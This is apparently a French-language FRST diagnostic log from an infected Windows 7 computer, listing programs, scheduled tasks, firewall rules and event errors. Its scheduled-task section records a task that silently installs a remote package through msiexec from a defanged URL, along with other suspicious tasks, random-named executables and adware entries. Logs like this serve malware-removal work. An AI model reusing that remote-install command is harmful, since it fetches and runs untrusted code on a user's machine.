Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 28.12.2018 01
Exécuté par emilio (28-12-2018 14:36:15)
Exécuté depuis C:\Users\emilio\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2018-12-22 23:31:02)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

9BC6008DFFB04F188AD1 (S-1-5-21-3051809612-600751579-747859315-1003 - Limited - Enabled)
Administrateur (S-1-5-21-3051809612-600751579-747859315-500 - Administrator - Disabled)
emilio (S-1-5-21-3051809612-600751579-747859315-1000 - Administrator - Enabled) => C:\Users\emilio
HomeGroupUser$ (S-1-5-21-3051809612-600751579-747859315-1002 - Limited - Enabled)
Invité (S-1-5-21-3051809612-600751579-747859315-501 - Limited - Disabled)

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

µTorrent (HKU\S-1-5-21-3051809612-600751579-747859315-1000\...\uTorrent) (Version: 3.5.5.44954 - BitTorrent Inc.)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.00 - Adobe Systems)
Apple Software Update (HKLM-x32\...\{6956856F-B6B3-4BE0-BA0B-8F495BE32033}) (Version: 2.1.1.116 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.13 - Michael Tippach)
Audacity 2.3.0 (HKLM-x32\...\Audacity_is1) (Version: 2.3.0 - Audacity Team)
Avid Effects (HKLM-x32\...\{A86F1158-A7F7-4E8C-98E3-88F4996E85EB}) (Version: 10.3.7 - Avid Technology, Inc.)
Avid HD Driver (x64) (HKLM\...\{658E112A-8776-4430-A275-D9248732DFB9}) (Version: 10.3.7 - Avid Technology, Inc.)
Avid Pro Tools (HKLM-x32\...\{8E60BB71-7EF3-42ED-9F10-AA041F25841A}) (Version: 10.3.7 - Avid Technology, Inc.)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.31.1038.0 - Logitech) Hidden
CPUID CPU-Z 1.86 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.86 - CPUID, Inc.)
Debut Video Capture Software (HKLM-x32\...\Debut) (Version: 2.02 - NCH Software)
DFX (HKLM-x32\...\DFX) (Version: 12.014.0.0 - Power Technology)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FFmpeg (Windows) for Audacity version 2.2.2 (HKLM-x32\...\{9C7E31E3-017F-434C-AC40-24431A354A1E}_is1) (Version: 2.2.2 - )
Freemake Audio Converter version 1.1.8 (HKLM-x32\...\Freemake Audio Converter_is1) (Version: 1.1.8 - Ellora Assets Corporation)
Killer Bugs v3 for Pro Tools 10.3.7 5.7.7 (HKLM-x32\...\Killer Bugs v3 for Pro Tools 10.3.7 5.7.7) (Version: 5.7.7 - Sovivoloko)
K-Lite Mega Codec Pack 14.6.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.6.0 - KLCP)
LADSPA_plugins-win-0.4.15 (HKLM-x32\...\LADSPA_plugins-win_is1) (Version: - Audacity Team)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Logitech Vid HD (HKLM-x32\...\Logitech Vid) (Version: 7.2 (7259) - Logitech Inc..)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.31 - Logitech Inc.)
LWS VideoEffects (HKLM\...\{138A4072-9E64-46BD-B5F9-DB2BB395391F}) (Version: 13.30.1379.0 - Logitech) Hidden
Max Recorder (HKLM-x32\...\Max Recorder) (Version: 2.006.0.0 - Silver Vine, LLC)
Microsoft .NET Framework 4.7.2 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mises à jour NVIDIA 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation)
Mozilla Firefox 64.0 (x64 fr) (HKLM\...\Mozilla Firefox 64.0 (x64 fr)) (Version: 64.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0 - Mozilla)
NVIDIA Pilote 3D Vision 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)
NVIDIA Pilote audio HD : 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Pilote graphique 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.0.0.0256 - PACE Anti-Piracy, Inc.)
Panneau de configuration NVIDIA 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 340.52 - NVIDIA Corporation) Hidden
QuickTime (HKLM-x32\...\{C78EAC6F-7A73-452E-8134-DBB2165C5A68}) (Version: 7.62.14.0 - Apple Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.115.1208.2017 - Realtek)
Remo Recover 4.0 (HKLM\...\{A573D759-F894-448D-A420-3A9C31879F88}_is1) (Version: 4.0.0.32 - Remo Software)
Revo Uninstaller 2.0.6 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.6 - VS Revo Group, Ltd.)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version: - DownloadHelper)
Vegas Pro 11.0 (64-bit) (HKLM\...\{317ED8CF-E935-11E0-A689-F04DA23A5C58}) (Version: 11.0.371 - Sony)
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 3.89 - NCH Software)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
VST Bridge 1.1 (HKLM-x32\...\VST Bridge_is1) (Version: - )
Web Companion (HKLM-x32\...\{29fbf7fe-3e60-4aa4-91d4-0a18ef4318ca}) (Version: 4.5.1957.3838 - Lavasoft)
Web Companion (HKLM-x32\...\{65d72eb4-2f0b-4a48-9689-3ffe4b6cfdde}) (Version: 4.4.1950.3825 - Lavasoft)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll -> Pas de fichier
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-07-02] (NVIDIA Corporation)
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll -> Pas de fichier
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)

==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {0B5D627E-05F5-4F3E-9D1E-163938A7D3DF} - System32\Tasks\klcp_update => CodecTweakTool.exe
Task: {764588D4-CA37-4CAC-83E7-E4575C000477} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2008-07-30] (Apple Inc.)
Task: {BDCF20F4-5B31-40AB-A708-37310FAB69D1} - System32\Tasks\{1666D112-8549-6662-CB7E-36835FCBCA89} => "msiexec" -package hxxps://freamares.com/yp77k0f1xe2w.pvo /q
Task: {C14E5AF4-3734-426B-8182-95DB91002C4A} - System32\Tasks\NCH Software\DebutSevenDays => C:\Program Files (x86)\NCH Software\Debut\Debut.exe [2014-08-01] (NCH Software)
Task: {C68A8F0B-BFCA-4CD4-BE0F-97C5BB6BE441} - System32\Tasks\{311AE85A-CBA0-4B20-89DC-BB059512E346} => C:\Users\emilio\HeooXuE.exe [2009-07-14] (Microsoft Corporation)
Task: {E9CFDEBC-247F-45A5-8F88-395704BD4549} - System32\Tasks\NCH Software\VideoPadSevenDays => C:\Program Files (x86)\NCH Software\VideoPad\VideoPad.exe [2015-02-03] (NCH Software)
Task: {F4BD3264-C448-450A-938D-93F053EF7369} - System32\Tasks\{FBB80D28-CA82-0AC4-6A97-F16BEBF3B1F1} => "C:\Program Files\Mozilla Firefox\firefox.exe" hxxp://coxemi.com/cl/?guid=rtb82ukihr5ek1oyuq2ltpukdhzl0g3h&prid=1&pid=4_1419_0

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Raccourcis & WMI ========================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)


Shortcut: C:\Users\emilio\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.htm

==================== Modules chargés (Avec liste blanche) ==============

2018-12-24 10:07 - 2014-07-02 19:55 - 000116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-01-30 00:26 - 2012-01-30 00:26 - 001465344 _____ () C:\Program Files (x86)\chrome\chrome.exe
2011-11-11 14:07 - 2011-11-11 14:07 - 000265240 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2011-08-12 12:19 - 2011-08-12 12:19 - 000680984 _____ () C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
2018-12-23 00:52 - 2018-12-28 12:09 - 000025888 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
2018-12-23 00:52 - 2018-12-28 12:09 - 000017696 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.Service.Logger.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000037664 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WcfService.dll
2011-11-11 14:08 - 2011-11-11 14:08 - 002145304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2011-11-11 14:08 - 2011-11-11 14:08 - 007956504 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2011-11-11 14:08 - 2011-11-11 14:08 - 000342552 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2011-11-11 14:08 - 2011-11-11 14:08 - 000029208 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2011-11-11 14:08 - 2011-11-11 14:08 - 000128536 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-23 20:43 - 2012-09-23 20:43 - 000010240 _____ () C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\locale\fr_fr\acrotray.fra
2011-11-11 14:09 - 2011-11-11 14:09 - 000336408 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000121120 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AppCore.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000105248 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000373536 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000084256 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SysInfo.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000068384 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Events.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000059168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000020768 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Compression.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000065824 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\MozCompressor.dll
2018-12-23 00:52 - 2018-12-28 12:09 - 000135464 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\liblz4.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)

AlternateDataStreams: C:\ProgramData\TEMP:6DDED7D9 [233]
AlternateDataStreams: C:\Users\emilio\Cookies:CeSCSD5heKtaJRYCtn [2318]
AlternateDataStreams: C:\Users\emilio\AppData\Local\AiGa3affCQ8:GPK5IHAfVHwwMfIC6VdAEUUiO2 [2468]
AlternateDataStreams: C:\Users\emilio\AppData\Local\E7RWjN8UM9dXyaE:PIrrAHN6AKeaV5M9qXf1OV [2288]
AlternateDataStreams: C:\Users\emilio\AppData\Local\H2q4jK0QucdEkKk:pDfIrTCxbUvmki8jpvcf7 [2602]
AlternateDataStreams: C:\Users\emilio\AppData\Local\Temp:RF3TGW9z1uV8jJKFYTifcgv5X [2350]
AlternateDataStreams: C:\Users\emilio\AppData\Local\Temporary Internet Files:5eDq2TCJHcyxtmlnG2kAj16Io [2510]

==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)


==================== Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)


==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3051809612-600751579-747859315-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3051809612-600751579-747859315-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenu: ===============================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2009-07-14 03:34 - 2018-12-28 12:00 - 000000852 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-3051809612-600751579-747859315-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\emilio\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.


==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{883226FA-9501-4DCA-83DD-1833687D906C}] => (Allow) C:\Users\emilio\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [{84F245DC-8D6A-4F38-BCF9-B0DD41B7CDFA}] => (Allow) C:\Users\emilio\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [{E6811ECF-CBA6-4A48-8A75-10C8C3F6B623}] => (Allow) C:\Users\emilio\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [{F79A95B6-77EE-46C6-8759-74DECD9DEB17}] => (Allow) C:\Users\emilio\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [TCP Query User{DD4ABA96-A712-4A2A-ACE7-2B20A959022F}C:\program files (x86)\logitech\vid hd\vid.exe] => (Allow) C:\program files (x86)\logitech\vid hd\vid.exe (Logitech Inc.)
FirewallRules: [UDP Query User{6BD8C713-2558-4260-9CE5-72035361031E}C:\program files (x86)\logitech\vid hd\vid.exe] => (Allow) C:\program files (x86)\logitech\vid hd\vid.exe (Logitech Inc.)
FirewallRules: [{7999C155-94AD-4407-96AA-330849D89153}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
FirewallRules: [{F11AD1F7-20C3-4B3F-8AD2-26A74368D889}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
FirewallRules: [TCP Query User{D35625D1-159E-47B0-835F-1DAF57FFAACF}C:\program files (x86)\avid\pro tools\protools.exe] => (Allow) C:\program files (x86)\avid\pro tools\protools.exe (Avid Technology, Inc.)
FirewallRules: [UDP Query User{EC69666B-212A-45F2-8B79-2C56384D451A}C:\program files (x86)\avid\pro tools\protools.exe] => (Allow) C:\program files (x86)\avid\pro tools\protools.exe (Avid Technology, Inc.)
FirewallRules: [{E6DBDDC7-86A6-4156-9C29-A9104C5FFB59}] => (Allow) C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation)
FirewallRules: [{0E58C80B-129B-47F4-9C64-7780B72BA763}] => (Allow) C:\Program Files (x86)\qlndylAxZJ.exe (Microsoft Corporation)
FirewallRules: [{11B6DF3E-6C35-40A8-B9A3-0D5CDCFEECA5}] => (Allow) C:\Users\emilio\HeooXuE.exe (Microsoft Corporation)
FirewallRules: [{F26B03FE-BB1A-4526-B5F3-11E250FD1841}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)

==================== Points de restauration =========================

27-12-2018 02:26:34 Revo Uninstaller's restore point - Wondershare MobileGo(Version 8.5.0)
27-12-2018 02:28:23 Revo Uninstaller's restore point - Wondershare MobileGo(Version 8.5.0)
28-12-2018 11:26:03 Sauvegarde Windows
28-12-2018 11:40:53 Revo Uninstaller's restore point - Malwarebytes' Anti-Malware

==================== Éléments en erreur du Gestionnaire de périphériques =============


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (12/28/2018 02:36:04 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:35:34 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:35:04 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:34:34 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:34:03 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:33:33 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:33:03 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/28/2018 02:32:33 PM) (Source: chrome.exe) (EventID: 0) (User: )
Description: Event-ID 0


Erreurs système:
=============
Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Cache de police de Windows Presentation Foundation 3.0.0.0 s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 0 millisecondes : Redémarrer le service.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Service Partage réseau du Lecteur Windows Media s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 30000 millisecondes : Redémarrer le service.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service Chrome s’est terminé de façon inattendue pour la 1ème fois.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service Wondershare Application Framework Service s’est terminé de façon inattendue pour la 1ème fois.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service UMVPFSrv s’est terminé de façon inattendue pour la 1ème fois.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service Adobe Acrobat Update Service s’est terminé de façon inattendue pour la 1ème fois.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service PACE License Services s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 60000 millisecondes : Redémarrer le service.

Error: (12/28/2018 12:00:01 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service NVIDIA Display Driver Service s’est terminé de façon inattendue pour la 1ème fois.


Windows Defender:
===================================
Date: 2018-12-25 13:47:22.759
Description:
Windows Defender a rencontré une erreur lors de la tentative de mise à jour du moteur.
Nouvelle version du moteur : 1.1.15500.2
Version précédente du moteur : 1.1.6402.0
Source de la mise à jour : Utilisateur
Utilisateur : AUTORITE NT\Système
Code d’erreur : 0x8050800c
Description de l’erreur : Un problème inattendu s’est produit. Installez toutes les mises à jour disponibles, puis essayez de redémarrer le programme. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support.

Date: 2018-12-24 10:09:17.825
Description:
Windows Defender a rencontré une erreur lors de la tentative de mise à jour du moteur.
Nouvelle version du moteur : 1.1.15500.2
Version précédente du moteur : 1.1.6402.0
Source de la mise à jour : Utilisateur
Utilisateur : emilio-PC\emilio
Code d’erreur : 0x8050800c
Description de l’erreur : Un problème inattendu s’est produit. Installez toutes les mises à jour disponibles, puis essayez de redémarrer le programme. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support.

Date: 2018-12-24 06:52:30.326
Description:
Windows Defender a rencontré une erreur lors de la tentative de mise à jour du moteur.
Nouvelle version du moteur : 1.1.15500.2
Version précédente du moteur : 1.1.6402.0
Source de la mise à jour : Utilisateur
Utilisateur : AUTORITE NT\Système
Code d’erreur : 0x8050800c
Description de l’erreur : Un problème inattendu s’est produit. Installez toutes les mises à jour disponibles, puis essayez de redémarrer le programme. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support.

Date: 2018-12-23 03:12:17.894
Description:
Windows Defender a rencontré une erreur lors de la tentative de mise à jour du moteur.
Nouvelle version du moteur : 1.1.15500.2
Version précédente du moteur : 1.1.6402.0
Source de la mise à jour : Utilisateur
Utilisateur : AUTORITE NT\Système
Code d’erreur : 0x8050800c
Description de l’erreur : Un problème inattendu s’est produit. Installez toutes les mises à jour disponibles, puis essayez de redémarrer le programme. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support.

CodeIntegrity:
===================================

Date: 2018-12-24 03:46:25.432
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:46:25.027
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:46:24.668
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:46:24.215
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:40:51.072
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:40:50.588
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:40:50.089
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

Date: 2018-12-24 03:40:49.621
Description:
Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume1\Program Files\Common Files\adaware\adaware antivirus\updater\12.6.997.11652\AdAwareUpdater.exe car le jeu de hachages d’images par page n’a pas été trouvé sur le système.

==================== Infos Mémoire ===========================

Processeur: Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz
Pourcentage de mémoire utilisée: 43%
Mémoire physique - RAM - totale: 4062.05 MB
Mémoire physique - RAM - disponible: 2283.38 MB
Mémoire virtuelle totale: 8122.25 MB
Mémoire virtuelle disponible: 5720.42 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:60.01 GB) (Free:17.53 GB) NTFS ==>[lecteur avec composants d'amorçage (obtenu depuis BCD)]
Drive d: () (Fixed) (Total:89.04 GB) (Free:6.69 GB) NTFS
Drive g: (TOSHIBA EXT) (Fixed) (Total:931.51 GB) (Free:472.37 GB) NTFS


==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: 8D857EF4)
Partition 1: (Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=89 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: BEEA77B0)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Fin de Addition.txt ============================